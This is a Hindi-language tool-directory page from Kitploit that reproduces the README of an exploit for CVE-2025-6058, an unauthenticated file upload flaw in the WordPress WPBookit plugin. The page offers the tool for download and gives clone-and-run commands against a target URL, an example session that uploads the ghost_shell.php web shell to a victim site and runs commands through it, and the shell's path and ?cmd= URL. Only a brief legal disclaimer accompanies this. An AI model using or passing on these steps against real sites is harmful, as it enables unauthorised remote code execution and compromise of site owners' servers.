Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2025-6058
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub0xgh057r3c0n/cve-2025-6058

CVE-2025-6058

WordPress WPBookit ≤ 1.0.4 अप्रमाणित फ़ाइल अपलोड शोषण

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WordPress लोगो

🚨 CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 बिना प्रमाणीकरण के फ़ाइल अपलोड शोषण

WordPress WPBookit प्लगइन (≤ 1.0.4) को लक्षित करने वाला बिना प्रमाणीकरण का मनमाना फ़ाइल अपलोड शोषण
यह शोषण रिमोट शेल अपलोड और पूर्ण कमांड निष्पादन की अनुमति देता है।

लेखक: 0xgh057r3c0n


📌 भेद्यता के बारे में

CVE-2025-6058 एक गंभीर भेद्यता है जो WordPress CMS पर WPBookit प्लगइन को प्रभावित करती है। एक बिना प्रमाणीकरण वाला हमलावर एक असुरक्षित AJAX एंडपॉइंट का दुरुपयोग करके मनमानी PHP फ़ाइलें अपलोड कर सकता है, जो रिमोट कोड निष्पादन (RCE) को सक्षम करता है।

  • 🎯 लक्ष्य: WordPress CMS (असुरक्षित WPBookit प्लगइन)
  • 📦 प्रभावित प्लगइन: WPBookit ≤ 1.0.4
  • ⚠️ जोखिम स्तर: गंभीर (बिना प्रमाणीकरण का RCE)

✨ विशेषताएँ

  • 🔍 README.txt के माध्यम से WordPress प्लगइन संस्करण का स्वतः पता लगाता है
  • 📤 हल्का PHP शेल अपलोड करता है (ghost_shell.php)
  • 🖥️ इंटरैक्टिव शेल (Parrot-शैली प्रॉम्प्ट)
  • 🌐 बिना प्रमाणीकरण — लॉगिन की आवश्यकता नहीं
  • 🎨 रंगीन CLI आउटपुट

🚀 उपयोग गाइड

💻 आवश्यकताएँ

python3 --version
pip install requests

⚙️ शोषण निष्पादन

git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com

🛠️ उदाहरण शेल सत्र

python3 CVE-2025-6058.py -u https://victim.com

[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.

[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

[!] Interactive GhostShell Started — type 'exit' to quit.

┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data

📂 शेल विवरण

  • फ़ाइल नाम: ghost_shell.php
  • पथ: /wp-content/uploads/YYYY/MM/ghost_shell.php
  • उदाहरण:
https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

⚠️ कानूनी अस्वीकरण

यह शोषण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए विकसित किया गया है। स्पष्ट सहमति के बिना सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है।


📄 लाइसेंस

MIT लाइसेंस के तहत जारी


🛡️ WordPress सुरक्षा ऑडिटिंग के लिए बनाया गया 0xgh057r3c0n द्वारा

टूल डाउनलोड करें